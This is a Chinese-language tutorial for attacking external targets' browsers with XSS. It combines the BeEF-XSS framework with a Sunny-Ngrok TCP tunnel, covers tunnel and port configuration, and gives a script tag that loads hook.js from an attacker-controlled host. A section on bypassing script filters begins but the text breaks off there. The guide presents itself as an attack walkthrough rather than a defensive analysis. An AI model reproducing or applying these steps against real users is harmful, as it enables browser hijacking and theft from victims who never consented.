Beef-XSS与Sunny-Ngrok实现内网穿透攻击指南

概述

本教程详细讲解如何结合Beef-XSS框架和Sunny-Ngrok内网穿透工具，实现对外网目标浏览器的XSS攻击。主要内容包括内网穿透配置、Beef-XSS设置以及绕过脚本过滤的技巧。

实验工具

• Kali Linux v2.0
• Beef-XSS框架

第一部分：配置Sunny-Ngrok实现内网穿透

1. 开通TCP代理隧道

1. 登录Sunny-Ngrok管理面板
2. 导航至"隧道管理" > "开通隧道"
3. 选择免费或付费隧道（免费版可用）
4. 配置隧道参数：
   • 协议类型：TCP
   • 自定义隧道名称
   • 设置本地端口号（建议3000）
   • 关键点：远程端口号必须与本地端口号保持一致（避免hook.js请求失败）

2. 下载并运行客户端

1. 从Sunny-Ngrok下载页面获取对应版本客户端
2. 使用以下命令连接：

   ./sunny clientid 隧道id
   

第二部分：配置Beef-XSS

1. 修改监听端口

1. 编辑Beef-XSS配置文件：

   /etc/beef-xss/config.yaml
   

2. 修改port参数，确保与Ngrok设置的端口一致（如3000）

2. 启动Beef-XSS

直接执行命令：

beef-xss

第三部分：绕过脚本过滤实现XSS攻击

1. 常规hook.js加载方式

正常情况下加载hook.js的代码：

<script type="text/javascript" src="http://yoururl.com/hook.js"></script>

2. 绕过